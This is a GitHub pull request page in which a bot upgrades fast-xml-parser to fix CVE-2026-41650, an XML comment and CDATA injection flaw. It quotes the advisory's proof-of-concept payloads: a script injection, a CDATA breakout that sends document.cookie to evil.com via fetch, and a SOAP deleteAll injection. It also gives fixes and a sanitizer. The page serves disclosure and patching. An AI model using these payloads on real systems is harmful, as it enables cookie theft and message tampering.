Update npm package fast-xml-parser to v5.7.0 [SECURITY]#8654

Merged
hash-worker[bot] merged 1 commit into main from deps/js/npm-fast-xml-parser-vulnerability
Apr 23, 2026
@hash-worker hash-worker Bot commented Apr 22, 2026

This PR contains the following updates:

Package Change Age Confidence
fast-xml-parser 5.5.7 -> 5.7.0 age confidence

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2026-41650

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters

Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
    // ...
    if (key === this.options.commentPropName) {
        return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
    }
    // ...
    if (key === this.options.cdataPropName) {
        return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
    }
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept

Test 1: Comment Injection (XSS in SVG/HTML context)

import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));

Output:

<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>

Test 2: CDATA Injection (RSS feed)

const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: { channel: { item: {
    title: "Article",
    description: {
      "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
    }
  }}}
};

console.log(builder.build(rss));

Output:

<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>

Test 3: SOAP Message Injection

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
   Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true

4. Round-trip test:
   Injection present: true

5. SOAP MESSAGE INJECTION:
   Contains injected Action: true

Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

  1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
  2. SOAP injection: Modify SOAP message structure by injecting XML elements
  3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
  4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
    const safeVal = String(val).replace(/--/g, '&#45;&#45;');
    return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
    const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
    return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}

Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.7.0

v5.6.0: use @nodable/entities to replace entities

  • No API change
  • No change in performance for basic usage
  • No typing change
  • No config change
  • new dependency
  • breaking: error messages for entities might have been changed.

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.12...v5.6.0

v5.5.12

v5.5.11

v5.5.10: performance improvement, increase entity expansion default limit

  • increase default entity expansion limit as many projects demand for that
    maxEntitySize: 10000,
    maxExpansionDepth: 10000,
    maxTotalExpansions: Infinity,
    maxExpandedLength: 100000,
    maxEntityCount: 1000,
  • performance improvement
    • reduce calls to toString
    • early return when entities are not present
    • prepare rawAttrsForMatcher only if user sets jPath: false

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10

v5.5.9: fix typings and matcher instance in callbacks

combine typings file to avoid configuration changes
pass readonly instance of matcher to the callbacks to avoid accidental push/pop call

v5.5.8


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - "before 4am every weekday,every weekend" (UTC).

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR has been generated by Renovate Bot.
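
The delimiter breakout described in the advisory above can also be neutralized in the caller before data reaches `XMLBuilder.build()`. The following is an added example, not code from this PR or from fast-xml-parser: the function names are hypothetical, the property names `#comment` and `#cdata` are the ones used in the PoC options, and `scanCdata` is a small checker written here to confirm that no text lands outside a CDATA section.

```javascript
// Added example: pre-build guard for objects handed to XMLBuilder.build().
// COMMENT_PROP / CDATA_PROP mirror commentPropName / cdataPropName from the PoC;
// every function name below is hypothetical.
const COMMENT_PROP = "#comment";
const CDATA_PROP = "#cdata";

// XML 1.0 forbids "--" inside a comment and a comment may not end in "-".
// A space after each hyphen that precedes another hyphen removes every "-->".
// HTML parsers also close a comment whose text starts with ">" or "->".
function neutralizeComment(value) {
  let s = String(value).replace(/-(?=-)/g, "- ");
  if (s.endsWith("-")) s += " ";
  if (/^-?>/.test(s)) s = " " + s;
  return s;
}

// Same idea as the advisory's suggested fix: end the section after "]]" and
// reopen a new one before ">", so the terminator never appears in one piece.
function splitCdata(value) {
  return String(value).replace(/]]>/g, "]]]]><![CDATA[>");
}

// Apply a sanitizer to a single value or to each item of an array of values.
function mapLeaf(val, fn) {
  return Array.isArray(val) ? val.map(fn) : fn(val);
}

// Return a deep copy of `node` with comment and CDATA properties sanitized.
function hardenForBuilder(node) {
  if (Array.isArray(node)) return node.map(hardenForBuilder);
  if (node === null || typeof node !== "object") return node;
  const out = {};
  for (const [key, val] of Object.entries(node)) {
    if (key === COMMENT_PROP) out[key] = mapLeaf(val, neutralizeComment);
    else if (key === CDATA_PROP) out[key] = mapLeaf(val, splitCdata);
    else out[key] = hardenForBuilder(val);
  }
  return out;
}

// Checker: split serialized output into text inside CDATA sections and text
// outside them. For a lone CDATA node, `outside` must be empty and `inside`
// must equal the original value.
function scanCdata(xml) {
  const OPEN = "<![CDATA[";
  const CLOSE = "]]>";
  let pos = 0;
  let inside = "";
  let outside = "";
  while (pos < xml.length) {
    const open = xml.indexOf(OPEN, pos);
    if (open === -1) { outside += xml.slice(pos); break; }
    outside += xml.slice(pos, open);
    const close = xml.indexOf(CLOSE, open + OPEN.length);
    if (close === -1) { inside += xml.slice(open + OPEN.length); break; }
    inside += xml.slice(open + OPEN.length, close);
    pos = close + CLOSE.length;
  }
  return { inside, outside };
}

// Constructed sample, shaped like the PoC input on this page.
const sample = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content",
  },
};
console.log(hardenForBuilder(sample));
```

The same assertions work as a regression test around the real builder after the upgrade: build a comment-only and a CDATA-only document from hostile strings and check that the first `-->` is the final three characters and that `scanCdata(...).outside` is empty.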

@hash-worker hash-worker Bot enabled auto-merge April 22, 2026 22:25
vercel Bot commented Apr 22, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

Project Deployment Actions Updated (UTC)
hash Ready Ready Preview, Comment Apr 22, 2026 10:38pm
hashdotdesign-tokens Ready Ready Preview, Comment Apr 22, 2026 10:38pm
petrinaut Ready Ready Preview, Comment Apr 22, 2026 10:38pm

cursor Bot commented Apr 22, 2026

PR Summary

Medium Risk
Dependency-only change, but it updates XML parsing/building internals and transitive packages, which could subtly alter generated XML or parsing behavior in any code paths using fast-xml-parser. Security-driven upgrade reduces exposure but warrants validation of XML output compatibility.

Overview
Updates the pinned fast-xml-parser resolution from 5.5.7 to 5.7.0.

Refreshes yarn.lock to match the new release, including new transitive dependency @nodable/entities and bumps to related XML utility packages (fast-xml-builder, path-expression-matcher, strnum).

Reviewed by Cursor Bugbot for commit d317984. Bugbot is set up for automated code reviews on this repo. Configure here.

augmentcode Bot commented Apr 22, 2026

🤖 Augment PR Summary

Summary: Updates the repo’s Yarn resolution for fast-xml-parser to a newer patched release to address the security advisory referenced in the PR.

Changes:

  • Bumped fast-xml-parser from 5.5.7 to 5.7.0 in the root package.json resolutions.
  • Regenerated the lockfile to pick up the upgraded package version.

Technical Notes: This is a security-driven upgrade; ensure any transitive uses of fast-xml-parser (especially XML building paths) continue to behave as expected after the bump.

@augmentcode augmentcode Bot left a comment

Review completed. No suggestions at this time.

Comment augment review to trigger a new review at any time.

codecov Bot commented Apr 22, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 62.49%. Comparing base (adb5688) to head (d317984).
⚠️ Report is 6 commits behind head on main.

Additional details and impacted files
@@            Coverage Diff             @@
##             main    #8654      +/-   ##
==========================================
- Coverage   62.50%   62.49%   -0.01%     
==========================================
  Files        1318     1318              
  Lines      134234   134234              
  Branches     5520     5520              
==========================================
- Hits        83906    83896      -10     
- Misses      49415    49423       +8     
- Partials      913      915       +2     
Flag Coverage Δ
apps.hash-ai-worker-ts 1.40% <ø> (ø)
apps.hash-api 0.00% <ø> (ø)
blockprotocol.type-system 40.84% <ø> (ø)
local.claude-hooks 0.00% <ø> (ø)
local.harpc-client 51.24% <ø> (ø)
local.hash-graph-sdk 9.63% <ø> (ø)
local.hash-isomorphic-utils 0.00% <ø> (ø)
rust.antsi 0.00% <ø> (ø)
rust.error-stack 90.87% <ø> (ø)
rust.harpc-codec 84.70% <ø> (ø)
rust.harpc-net 96.22% <ø> (-0.16%) ⬇️
rust.harpc-tower 67.03% <ø> (ø)
rust.harpc-types 0.00% <ø> (ø)
rust.harpc-wire-protocol 92.23% <ø> (ø)
rust.hash-codec 72.76% <ø> (ø)
rust.hash-graph-api 2.52% <ø> (ø)
rust.hash-graph-authorization 62.34% <ø> (ø)
rust.hash-graph-postgres-store 26.38% <ø> (ø)
rust.hash-graph-store 37.76% <ø> (ø)
rust.hash-graph-temporal-versioning 47.95% <ø> (ø)
rust.hash-graph-types 0.00% <ø> (ø)
rust.hash-graph-validation 83.45% <ø> (ø)
rust.hashql-ast 87.23% <ø> (ø)
rust.hashql-compiletest 29.69% <ø> (ø)
rust.hashql-core 82.29% <ø> (ø)
rust.hashql-diagnostics 72.43% <ø> (ø)
rust.hashql-eval 69.13% <ø> (ø)
rust.hashql-hir 89.06% <ø> (ø)
rust.hashql-mir 92.64% <ø> (ø)
rust.hashql-syntax-jexpr 94.05% <ø> (ø)


codspeed-hq Bot commented Apr 22, 2026

Merging this PR will not alter performance

✅ 80 untouched benchmarks


Comparing deps/js/npm-fast-xml-parser-vulnerability (d317984) with main (23b7c56)

@github-actions

Benchmark results

@rust/hash-graph-benches – Integrations

policy_resolution_large

Function Value Mean Flame graphs
resolve_policies_for_actor user: empty, selectivity: high, policies: 2002 $$26.4 \mathrm{ms} \pm 159 \mathrm{μs}\left({\color{gray}-0.405 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: low, policies: 1 $$2.85 \mathrm{ms} \pm 11.3 \mathrm{μs}\left({\color{gray}0.541 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: medium, policies: 1001 $$12.1 \mathrm{ms} \pm 64.1 \mathrm{μs}\left({\color{gray}0.961 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: high, policies: 3314 $$39.0 \mathrm{ms} \pm 323 \mathrm{μs}\left({\color{gray}0.277 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: low, policies: 1 $$12.4 \mathrm{ms} \pm 96.6 \mathrm{μs}\left({\color{gray}2.80 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: medium, policies: 1526 $$21.5 \mathrm{ms} \pm 149 \mathrm{μs}\left({\color{gray}0.866 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: high, policies: 2078 $$27.6 \mathrm{ms} \pm 157 \mathrm{μs}\left({\color{gray}-0.847 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: low, policies: 1 $$3.10 \mathrm{ms} \pm 14.1 \mathrm{μs}\left({\color{gray}0.296 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: medium, policies: 1033 $$13.0 \mathrm{ms} \pm 75.7 \mathrm{μs}\left({\color{gray}0.765 \mathrm{\%}}\right) $$ Flame Graph

policy_resolution_medium

Function Value Mean Flame graphs
resolve_policies_for_actor user: empty, selectivity: high, policies: 102 $$3.15 \mathrm{ms} \pm 19.9 \mathrm{μs}\left({\color{gray}0.497 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: low, policies: 1 $$2.42 \mathrm{ms} \pm 11.3 \mathrm{μs}\left({\color{gray}0.874 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: medium, policies: 51 $$2.73 \mathrm{ms} \pm 16.3 \mathrm{μs}\left({\color{gray}-0.308 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: high, policies: 269 $$4.44 \mathrm{ms} \pm 36.6 \mathrm{μs}\left({\color{gray}-0.412 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: low, policies: 1 $$2.92 \mathrm{ms} \pm 12.5 \mathrm{μs}\left({\color{gray}-0.824 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: medium, policies: 107 $$3.48 \mathrm{ms} \pm 18.7 \mathrm{μs}\left({\color{gray}-0.302 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: high, policies: 133 $$3.78 \mathrm{ms} \pm 24.7 \mathrm{μs}\left({\color{gray}-0.201 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: low, policies: 1 $$2.82 \mathrm{ms} \pm 16.3 \mathrm{μs}\left({\color{gray}0.755 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: medium, policies: 63 $$3.37 \mathrm{ms} \pm 21.7 \mathrm{μs}\left({\color{gray}-0.621 \mathrm{\%}}\right) $$ Flame Graph

policy_resolution_none

Function Value Mean Flame graphs
resolve_policies_for_actor user: empty, selectivity: high, policies: 2 $$2.19 \mathrm{ms} \pm 13.0 \mathrm{μs}\left({\color{gray}0.383 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: low, policies: 1 $$2.15 \mathrm{ms} \pm 9.36 \mathrm{μs}\left({\color{gray}-0.837 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: medium, policies: 1 $$2.25 \mathrm{ms} \pm 9.23 \mathrm{μs}\left({\color{gray}-2.242 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: high, policies: 8 $$2.44 \mathrm{ms} \pm 11.9 \mathrm{μs}\left({\color{gray}0.348 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: low, policies: 1 $$2.29 \mathrm{ms} \pm 10.3 \mathrm{μs}\left({\color{gray}-0.463 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: medium, policies: 3 $$2.53 \mathrm{ms} \pm 16.1 \mathrm{μs}\left({\color{gray}-0.101 \mathrm{\%}}\right) $$ Flame Graph

policy_resolution_small

Function Value Mean Flame graphs
resolve_policies_for_actor user: empty, selectivity: high, policies: 52 $$2.53 \mathrm{ms} \pm 15.2 \mathrm{μs}\left({\color{gray}0.469 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: low, policies: 1 $$2.27 \mathrm{ms} \pm 12.2 \mathrm{μs}\left({\color{gray}1.35 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: empty, selectivity: medium, policies: 25 $$2.39 \mathrm{ms} \pm 13.6 \mathrm{μs}\left({\color{gray}0.756 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: high, policies: 94 $$2.85 \mathrm{ms} \pm 16.0 \mathrm{μs}\left({\color{gray}-0.252 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: low, policies: 1 $$2.49 \mathrm{ms} \pm 11.2 \mathrm{μs}\left({\color{gray}0.902 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: seeded, selectivity: medium, policies: 26 $$2.67 \mathrm{ms} \pm 15.8 \mathrm{μs}\left({\color{gray}0.549 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: high, policies: 66 $$2.80 \mathrm{ms} \pm 14.0 \mathrm{μs}\left({\color{gray}0.603 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: low, policies: 1 $$2.48 \mathrm{ms} \pm 13.3 \mathrm{μs}\left({\color{gray}1.00 \mathrm{\%}}\right) $$ Flame Graph
resolve_policies_for_actor user: system, selectivity: medium, policies: 29 $$2.69 \mathrm{ms} \pm 13.8 \mathrm{μs}\left({\color{gray}0.263 \mathrm{\%}}\right) $$ Flame Graph

read_scaling_complete

Function Value Mean Flame graphs
entity_by_id;one_depth 1 entities $$39.0 \mathrm{ms} \pm 153 \mathrm{μs}\left({\color{gray}1.34 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;one_depth 10 entities $$77.0 \mathrm{ms} \pm 316 \mathrm{μs}\left({\color{gray}-2.270 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;one_depth 25 entities $$42.7 \mathrm{ms} \pm 192 \mathrm{μs}\left({\color{gray}-0.089 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;one_depth 5 entities $$47.5 \mathrm{ms} \pm 186 \mathrm{μs}\left({\color{gray}0.367 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;one_depth 50 entities $$54.7 \mathrm{ms} \pm 250 \mathrm{μs}\left({\color{gray}0.286 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;two_depth 1 entities $$41.5 \mathrm{ms} \pm 282 \mathrm{μs}\left({\color{gray}0.469 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;two_depth 10 entities $$420 \mathrm{ms} \pm 1.01 \mathrm{ms}\left({\color{gray}-3.004 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;two_depth 25 entities $$92.3 \mathrm{ms} \pm 355 \mathrm{μs}\left({\color{gray}1.90 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;two_depth 5 entities $$91.5 \mathrm{ms} \pm 376 \mathrm{μs}\left({\color{gray}0.447 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;two_depth 50 entities $$259 \mathrm{ms} \pm 872 \mathrm{μs}\left({\color{lightgreen}-9.940 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;zero_depth 1 entities $$16.7 \mathrm{ms} \pm 71.4 \mathrm{μs}\left({\color{gray}-1.699 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;zero_depth 10 entities $$17.6 \mathrm{ms} \pm 95.9 \mathrm{μs}\left({\color{gray}-0.965 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;zero_depth 25 entities $$17.6 \mathrm{ms} \pm 102 \mathrm{μs}\left({\color{gray}-1.357 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;zero_depth 5 entities $$17.3 \mathrm{ms} \pm 88.9 \mathrm{μs}\left({\color{gray}-0.806 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id;zero_depth 50 entities $$21.4 \mathrm{ms} \pm 92.1 \mathrm{μs}\left({\color{gray}-3.297 \mathrm{\%}}\right) $$ Flame Graph

read_scaling_linkless

Function Value Mean Flame graphs
entity_by_id 1 entities $$17.0 \mathrm{ms} \pm 99.6 \mathrm{μs}\left({\color{gray}-1.140 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id 10 entities $$16.9 \mathrm{ms} \pm 94.0 \mathrm{μs}\left({\color{gray}-0.533 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id 100 entities $$17.1 \mathrm{ms} \pm 88.7 \mathrm{μs}\left({\color{gray}0.546 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id 1000 entities $$17.7 \mathrm{ms} \pm 88.1 \mathrm{μs}\left({\color{gray}0.551 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id 10000 entities $$24.1 \mathrm{ms} \pm 145 \mathrm{μs}\left({\color{gray}-1.031 \mathrm{\%}}\right) $$ Flame Graph

representative_read_entity

Function Value Mean Flame graphs
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/block/v/1 $$31.1 \mathrm{ms} \pm 297 \mathrm{μs}\left({\color{gray}-3.380 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/book/v/1 $$31.2 \mathrm{ms} \pm 312 \mathrm{μs}\left({\color{gray}-0.323 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/building/v/1 $$30.9 \mathrm{ms} \pm 265 \mathrm{μs}\left({\color{gray}-2.553 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/organization/v/1 $$31.6 \mathrm{ms} \pm 312 \mathrm{μs}\left({\color{gray}-0.311 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/page/v/2 $$31.5 \mathrm{ms} \pm 273 \mathrm{μs}\left({\color{gray}-0.583 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/person/v/1 $$31.7 \mathrm{ms} \pm 263 \mathrm{μs}\left({\color{gray}0.735 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/playlist/v/1 $$30.7 \mathrm{ms} \pm 285 \mathrm{μs}\left({\color{gray}-1.597 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/song/v/1 $$31.4 \mathrm{ms} \pm 305 \mathrm{μs}\left({\color{gray}2.36 \mathrm{\%}}\right) $$ Flame Graph
entity_by_id entity type ID: https://blockprotocol.org/@alice/types/entity-type/uk-address/v/1 $$31.4 \mathrm{ms} \pm 258 \mathrm{μs}\left({\color{gray}0.842 \mathrm{\%}}\right) $$ Flame Graph

representative_read_entity_type

Function Value Mean Flame graphs
get_entity_type_by_id Account ID: bf5a9ef5-dc3b-43cf-a291-6210c0321eba $$6.93 \mathrm{ms} \pm 31.3 \mathrm{μs}\left({\color{gray}0.276 \mathrm{\%}}\right) $$ Flame Graph

representative_read_multiple_entities

Function Value Mean Flame graphs
entity_by_property traversal_paths=0 0 $$93.7 \mathrm{ms} \pm 390 \mathrm{μs}\left({\color{gray}-0.034 \mathrm{\%}}\right) $$
entity_by_property traversal_paths=255 1,resolve_depths=inherit:1;values:255;properties:255;links:127;link_dests:126;type:true $$136 \mathrm{ms} \pm 529 \mathrm{μs}\left({\color{gray}-2.234 \mathrm{\%}}\right) $$
entity_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:0;properties:0;links:0;link_dests:0;type:false $$101 \mathrm{ms} \pm 442 \mathrm{μs}\left({\color{gray}1.04 \mathrm{\%}}\right) $$
entity_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:0;properties:0;links:1;link_dests:0;type:true $$107 \mathrm{ms} \pm 444 \mathrm{μs}\left({\color{gray}0.760 \mathrm{\%}}\right) $$
entity_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:0;properties:2;links:1;link_dests:0;type:true $$115 \mathrm{ms} \pm 495 \mathrm{μs}\left({\color{gray}-0.473 \mathrm{\%}}\right) $$
entity_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:2;properties:2;links:1;link_dests:0;type:true $$119 \mathrm{ms} \pm 447 \mathrm{μs}\left({\color{gray}-0.752 \mathrm{\%}}\right) $$
link_by_source_by_property traversal_paths=0 0 $$98.5 \mathrm{ms} \pm 468 \mathrm{μs}\left({\color{gray}-1.855 \mathrm{\%}}\right) $$
link_by_source_by_property traversal_paths=255 1,resolve_depths=inherit:1;values:255;properties:255;links:127;link_dests:126;type:true $$122 \mathrm{ms} \pm 523 \mathrm{μs}\left({\color{gray}-0.555 \mathrm{\%}}\right) $$
link_by_source_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:0;properties:0;links:0;link_dests:0;type:false $$105 \mathrm{ms} \pm 495 \mathrm{μs}\left({\color{gray}-1.205 \mathrm{\%}}\right) $$
link_by_source_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:0;properties:0;links:1;link_dests:0;type:true $$111 \mathrm{ms} \pm 425 \mathrm{μs}\left({\color{gray}-1.834 \mathrm{\%}}\right) $$
link_by_source_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:0;properties:2;links:1;link_dests:0;type:true $$113 \mathrm{ms} \pm 471 \mathrm{μs}\left({\color{gray}-1.236 \mathrm{\%}}\right) $$
link_by_source_by_property traversal_paths=2 1,resolve_depths=inherit:0;values:2;properties:2;links:1;link_dests:0;type:true $$113 \mathrm{ms} \pm 384 \mathrm{μs}\left({\color{gray}-0.912 \mathrm{\%}}\right) $$

scenarios

Function Value Mean Flame graphs
full_test query-limited $$127 \mathrm{ms} \pm 498 \mathrm{μs}\left({\color{gray}3.66 \mathrm{\%}}\right) $$ Flame Graph
full_test query-unlimited $$135 \mathrm{ms} \pm 460 \mathrm{μs}\left({\color{gray}1.73 \mathrm{\%}}\right) $$ Flame Graph
linked_queries query-limited $$90.9 \mathrm{ms} \pm 506 \mathrm{μs}\left({\color{gray}1.55 \mathrm{\%}}\right) $$ Flame Graph
linked_queries query-unlimited $$503 \mathrm{ms} \pm 1.93 \mathrm{ms}\left({\color{gray}-3.388 \mathrm{\%}}\right) $$ Flame Graph

@hash-worker hash-worker Bot added this pull request to the merge queue Apr 23, 2026
Merged via the queue into main with commit ae8508e Apr 23, 2026
176 checks passed
@hash-worker hash-worker Bot deleted the deps/js/npm-fast-xml-parser-vulnerability branch April 23, 2026 12:52
Labels

area/deps Relates to third-party dependencies (area)
